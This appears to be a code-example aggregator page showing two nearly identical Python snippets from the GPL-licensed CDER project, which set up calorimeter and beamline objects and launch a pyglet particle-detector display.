    from core.calorimeter import had
    calorimeters.append(had.HAD_Calorimeter())
    
from core.particle import beamline
beam = beamline.Beamline()


####################################################
## Instantiate Display
from core.display import Display
display = Display(calorimeters, beam)
display.clear()

        
####################################################
## Run pyglet:
if __name__ == '__main__':
    pyglet.app.run()
Example #12
0
#   You should have received a copy of the GNU General Public License       #
#   along with CDER.  If not, see <http://www.gnu.org/licenses/>.           #
#############################################################################

import pyglet
from core import config

####################################################
## Instantiate calorimeter and beamline
calorimeters = []
if config.em_display:
    from core.calorimeter import em
    calorimeters.append(em.EM_Calorimeter())
if config.had_display:
    from core.calorimeter import had
    calorimeters.append(had.HAD_Calorimeter())

from core.particle import beamline
beam = beamline.Beamline()

####################################################
## Instantiate Display
from core.display import Display
display = Display(calorimeters, beam)
display.clear()

####################################################
## Run pyglet:
if __name__ == '__main__':
    pyglet.app.run()